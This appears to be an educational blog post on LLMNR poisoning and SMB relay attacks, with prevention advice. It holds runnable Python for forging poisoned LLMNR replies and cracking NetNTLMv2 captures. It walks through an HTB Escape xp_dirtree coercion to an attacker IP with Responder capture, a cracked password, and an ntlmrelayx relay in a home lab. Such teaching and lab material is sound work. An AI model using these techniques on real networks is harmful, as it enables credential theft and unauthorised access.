What is LLMNR?
LLMNR (Link-Local Multicast Name Resolution) is one of several local name resolution protocols. It reuses the DNS packet format and lets both IPv4 and IPv6 hosts resolve the names of other hosts on the same link, without a DNS server: the query is multicast to 224.0.0.252 (or FF02::1:3) on UDP port 5355 and any host on the segment may answer it.
Windows uses LLMNR (alongside the older NetBIOS Name Service, NBT-NS) as a fallback when DNS cannot resolve a name, but it has been slowly phased out in favor of mDNS (Multicast DNS).
A typical case: a user asks for a network drive by name, DNS has no record for it, so the client asks every host on the link whether it knows that name. If some machine answers, the client connects to it and tries to authenticate.
What is LLMNR Poisoning?
Because any host on the link may answer an LLMNR query, the fallback is exploitable whenever DNS fails: the client cannot reach its DNS server, or the user mistypes the name of the resource they are looking for. The client multicasts the question, an attacker on the same segment answers that the name belongs to their own IP, and the client then connects to the attacker-controlled server and tries to authenticate to it, typically with NTLM, handing over a NetNTLMv2 challenge/response in the process.
The attack exploits the trust a client places in whichever host answers first; nothing in LLMNR authenticates the answer.
The most popular tool for pulling off this attack and others like it is Responder, and it is straightforward to use. Let’s go through an example.
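As an added illustration (this code is not from the original post and is not Responder), the following builds the LLMNR query a client multicasts for a name DNS could not resolve, and the poisoned answer an attacker sends back pointing that name at their own address. The name fileserv, the transaction ID and the IP addresses are constructed for the example.

```python
"""Build and parse LLMNR (RFC 4795) packets: the query a client multicasts when DNS
has no answer, and the reply a poisoner sends to claim the name.

LLMNR reuses the DNS wire format: a 12-byte header, a question (labels + QTYPE
+ QCLASS) and, in replies, resource records.  Queries go to 224.0.0.252 (IPv4)
or FF02::1:3 (IPv6) on UDP 5355, and nothing authenticates who answers.
"""
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000                      # set in responses


def encode_name(name: str) -> bytes:
    """'fileserv' -> b'\\x08fileserv\\x00' (DNS label encoding)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Return (name, offset_after_name) for the label sequence at off."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointers not handled")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(txid: int, name: str) -> bytes:
    """What a client sends for a name DNS could not resolve (QDCOUNT=1)."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt: bytes):
    """Return (txid, name) for a single A/IN question, else None."""
    if len(pkt) < 17:
        return None
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_QR or qd != 1:
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    if (qtype, qclass) != (QTYPE_A, QCLASS_IN):
        return None
    return txid, name


def build_poisoned_answer(query: bytes, answer_ip: str, ttl: int = 30) -> bytes:
    """Answer whatever name was asked for with answer_ip.

    A legitimate host only replies for its own name; a poisoner copies the
    transaction ID and question from any query and points the name at itself.
    """
    parsed = parse_query(query)
    if parsed is None:
        raise ValueError("not an LLMNR A query")
    txid, name = parsed
    header = struct.pack("!HHHHHH", txid, FLAG_QR, 1, 1, 0, 0)   # QD=1, AN=1
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(octet) for octet in answer_ip.split("."))
    record = encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + record


def parse_answer(pkt: bytes):
    """Return (txid, name, ip, ttl) from the first A record of a response, else None."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & FLAG_QR or qd != 1 or an < 1:
        return None
    _qname, off = decode_name(pkt, 12)
    off += 4                                   # skip the question's QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if (rtype, rclass, rdlen) != (QTYPE_A, QCLASS_IN, 4):
        return None
    return txid, name, ".".join(str(b) for b in pkt[off:off + 4]), ttl


if __name__ == "__main__":
    # Constructed exchange: the client asks for 'fileserv' (a typo, absent from DNS)
    # and the poisoner at 10.10.14.171 claims it.  Addresses and IDs are illustrative.
    query = build_query(0x1234, "fileserv")
    reply = build_poisoned_answer(query, "10.10.14.171")
    print("query ->", LLMNR_GROUP, LLMNR_PORT, query.hex())
    print("reply  :", parse_answer(reply))
```

The reply carries no proof that the answering host actually owns the name, which is why the client happily connects to 10.10.14.171 afterwards; a poisoner simply has to be on the segment and answer faster than anyone else.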
Example - HTB Escape
This machine starts out with an SMB share that holds instructions for interacting with its MSSQL server. We can log in with those credentials and look around the service:
╰─ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
We can’t run many commands on this server and there isn’t anything interesting on the shares, but we can use the xp_dirtree stored procedure to make the server reach out to our machine over SMB. Because the UNC path below uses a raw IP address, no name lookup happens at all, so strictly this is not LLMNR poisoning: the capture works simply because SQL Server opens an outbound SMB connection and its service account authenticates to our listener with NTLM. Responder captures that NetNTLMv2 exchange exactly as it would after a poisoned LLMNR answer.
We start our Responder listener on tun0, because that is the VPN interface we are attacking over:
╰─ sudo responder -I tun0
Then, once we run the following on the SQL server:
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.14.171\share'
We get an authentication request in Responder:
[SMB] NTLMv2-SSP Client : 10.129.245.209
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:fc4fa2a821fa70ea...
We can then try to crack this hash using hashcat or john:
╰─ john hash -w=/home/kali/Desktop/Useful-Misc./rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:03 DONE (2024-04-21 14:15) 0.2583g/s 2765Kp/s 2765Kc/s 2765KC/s RENZOJAVIER..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
As long as you can make the target initiate an authenticated request to your machine (by coercing a connection to your IP, as here, or by winning the LLMNR/NBT-NS race for a name DNS cannot resolve), you can capture a NetNTLMv2 hash and crack it offline.
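To make concrete what john is doing with that captured line, here is an added example (not from the original post, and not how Responder or john are implemented) that recomputes the NetNTLMv2 proof for candidate passwords and compares it with the captured one. The user and domain names mirror the box above, but the password, server challenge and blob in the sample capture are constructed, so it is not the real hash from the box.

```python
"""Recompute NetNTLMv2 proofs to test password guesses against a Responder capture.

Responder logs NetNTLMv2 as  user::domain:serverchallenge:ntproofstr:blob.  The
client computed ntproofstr = HMAC-MD5(NTOWFv2, serverchallenge || blob), with
NTOWFv2 = HMAC-MD5(NT hash, UTF16LE(UPPER(user) || domain)) and the NT hash being
MD4(UTF16LE(password)).  Every input except the password is in the capture, so a
guess can be checked offline; that is all john/hashcat do, just far faster.
MD4 is implemented here because OpenSSL 3 builds of Python often lack hashlib md4.
"""
import hashlib
import hmac
import struct

_M = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (the primitive behind the NT hash)."""
    def f(x, y, z): return (x & y) | (~x & z & _M)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & _M
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    s0, s1, s2, s3 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2_idx = [(i % 4) * 4 + i // 4 for i in range(16)]
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = s0, s1, s2, s3
        for i in range(16):      # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & _M, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):      # round 2
            a, b, c, d = d, rotl((a + g(b, c, d) + x[r2_idx[i]] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):      # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3_idx[i]] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4]), b, c
        s0, s1, s2, s3 = (s0 + a) & _M, (s1 + b) & _M, (s2 + c) & _M, (s3 + d) & _M
    return struct.pack("<4I", s0, s1, s2, s3)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: the user name is upper-cased, the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntowf_v2(password, user, domain), challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str) -> dict:
    """Split 'user::domain:challenge:ntproofstr:blob' into its fields (hex decoded)."""
    user, sep, rest = line.strip().partition("::")
    if not sep:
        raise ValueError("not a NetNTLMv2 line")
    domain, challenge, proof, blob = rest.split(":", 3)
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("challenge must be 8 bytes and NTProofStr 16 bytes")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, candidates):
    """Return the first candidate password that reproduces the captured NTProofStr, else None."""
    h = parse_responder_line(line)
    for pw in candidates:
        proof = nt_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"])
        if hmac.compare_digest(proof, h["proof"]):
            return pw
    return None


def make_capture(user, domain, password, challenge, blob) -> str:
    """Build a Responder-style line for a known password (used only to construct the sample)."""
    proof = nt_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample capture: the names mirror the box above, but the password,
# challenge and blob are invented, so this is not the real hash from the box.
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_BLOB = bytes.fromhex("01010000" + "00" * 12 + "aa" * 8 + "00" * 4 + "00" * 8)
SAMPLE_CAPTURE = make_capture("sql_svc", "sequel", "Summer2024!", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_CAPTURE)
    print(crack(SAMPLE_CAPTURE, ["password", "Winter2023!", "Summer2024!"]))
```

Two things the code makes visible: the NT hash itself is never in the capture (only an HMAC over it), so a captured NetNTLMv2 line cannot be passed-the-hash, only cracked or relayed; and the user name is upper-cased while the domain is not, which matters if you ever rebuild a line by hand.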
LLMNR Poisoning Prevention
The primary defense is to disable LLMNR and NBT-NS wherever possible (LLMNR through Group Policy, NBT-NS per network adapter). That isn’t always possible in every organization; in that case network access control limits who can get onto a segment to answer queries, and strong, long passwords make the captured NetNTLMv2 hashes impractical to crack. Just keep in mind that a strong password does not stop the captured authentication from being relayed to another host that accepts NTLM and does not require SMB signing, which is the next attack.
What is SMB?
Server Message Block (SMB) regulates access to files, directories, printers, and similar resources over the network. The most common use is network shares: a directory tree on a server exported to multiple users within the internal network.
The two ports you will most often see are TCP 139 and 445. Port 139 is the NetBIOS (Network Basic Input Output System) session service, SMB carried over NetBIOS over TCP/IP, where hosts find each other by NetBIOS name. Port 445 is SMB directly over TCP; it does not need NetBIOS at all, although the two are usually open together on Windows hosts.
Let’s walk through a typical session:
- The client and server set up a session (over NetBIOS on 139, or directly on 445) and negotiate the SMB version/dialect.
- The client authenticates. In a domain this is normally Kerberos, but NTLM is still accepted as a fallback, and it is the NTLM exchange that can be captured and relayed.
- The client connects to the shared resource and, depending on its permissions, reads and writes files on it.
What is an SMB Relay Attack?
When a user accesses a shared resource, SMB authenticates the user as part of setting up the connection. An attacker on the network who receives that authentication attempt (for example after an LLMNR poison) can forward it to another server and impersonate the user there, without ever knowing the password. There are some important requirements:
- SMB signing must not be required on the target. Windows workstations and member servers default to signing enabled but not required, domain controllers require it by default, and recent Windows 11 and Windows Server 2025 releases have begun requiring it by default as well.
- Access to a second machine on the network, because since MS08-068 you cannot reflect the authentication back to the host it came from.
So to pull this off you need to reach multiple machines on the same network, and you want the relayed user to be a local administrator on the target machine. Without admin rights on the target you only get the shares that user can read; with them, ntlmrelayx can dump the target’s local SAM or execute commands.
Example - AD Lab
I’ve got an Active Directory lab set up following the TCM PEH course guide instructions. We have two victim workstations, one with a user who has local admin access and one without.
The attack goes like this:
- We scan the internal network and identify hosts that have SMB signing disabled or not required.
- We set up responder to answer LLMNR/NBT-NS queries, with its own SMB and HTTP servers turned off so that the connections land on ntlmrelayx instead.
- We set up ntlmrelayx to relay the authentication to another Windows host.
- We wait for a user to trigger some kind of interaction that reaches our server and use the relayed session.
The network and attack overview diagram is not reproduced here; the important point is that we need to be inside the network, as this is an internal attack.
So, first we run our internal port scan to identify hosts:
└─$ sudo nmap 192.168.113.0-255
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 16:31 EDT
Nmap scan report for 192.168.113.1
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.113.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.113.128
Host is up (0.00016s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5357/tcp open wsdapi
MAC Address: 00:0C:29:93:B0:1E (VMware)
Nmap scan report for 192.168.113.130
Host is up (0.00018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:22:81:6F (VMware)
Nmap scan report for 192.168.113.131
Host is up (0.00017s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:2F:DD:A6 (VMware)
We can map out that there are workstation hosts on 192.168.113.130 and 192.168.113.131 and a DC on 192.168.113.128 (the DNS, Kerberos, LDAP and global catalog ports give it away).
We can scan to see if signing is disabled or required:
└─$ nmap --script=smb2-security-mode.nse -p 445 -Pn --open 192.168.113.0-255
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 16:59 EDT
Nmap scan report for 192.168.113.128
Host is up (0.0013s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Nmap scan report for 192.168.113.130
Host is up (0.00040s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Nmap scan report for 192.168.113.131
Host is up (0.0048s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Nmap done: 256 IP addresses (256 hosts up) scanned in 2.83 seconds
We can see that the DC isn’t vulnerable but the two workstations should be, which matches the defaults: signing is required on domain controllers and only enabled, not required, on workstations.
Next we can start up responder, making sure to turn off its SMB and HTTP servers in Responder.conf (SMB = Off and HTTP = Off under [Responder Core]) so that those connections fall through to ntlmrelayx:
└─$ sudo responder -I eth0
We can also start ntlmrelayx, targeting the two workstations via a targets.txt file (one host per line). We also need to enable SMB2 support, and -i gives us an interactive SMB shell on a local port:
└─$ impacket-ntlmrelayx -tf targets.txt -smb2support -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Instead of waiting for some chance interaction, we can go onto one of the workstations (the one with local admin) and try to open the attacker machine as if it were a network share, for example by entering its IP as a UNC path in File Explorer. Responder shows the traffic come through, and in ntlmrelayx we see the following:
---SNIP---
[*] Received connection from MARVEL/fcastle at THEPUNISHER, connection will be relayed after re-authentication
[*] SMBD-Thread-5 (process_request_thread): Connection from MARVEL/FCASTLE@192.168.113.131 controlled, attacking target smb://192.168.113.130
[*] Authenticating against smb://192.168.113.130 as MARVEL/FCASTLE SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
---SNIP---
So we got an incoming connection from the host with local admin (ending in .131) and relayed the authentication to the other workstation (.130), which we can now reach through port 11000 on our machine:
└─$ nc 127.0.0.1 11000
Type help for list of commands
# info
Version Major: 10
Version Minor: 0
Server Name: SPIDERMAN
Server Comment:
Server UserPath: c:\
Simultaneous Users: 20
#
From here we can interact directly with the shares on the other workstation (SPIDERMAN), downloading and uploading files. Had we left -i off, ntlmrelayx’s default action for a relayed admin session over SMB is to dump the target’s local SAM hashes instead.
SMB Relay Attack Prevention
The cleanest fix is to require SMB signing on all devices, which closes the relay path outright, at some cost in throughput on large file copies and in compatibility with legacy devices that only speak older SMB dialects. If that isn’t viable for the environment, restrict local admin rights and use account tiering so that a typical user account is not an administrator on other machines, which limits what a relayed session can do. Disabling LLMNR and NBT-NS, as described above, also removes the easiest way for an attacker to attract the authentication in the first place.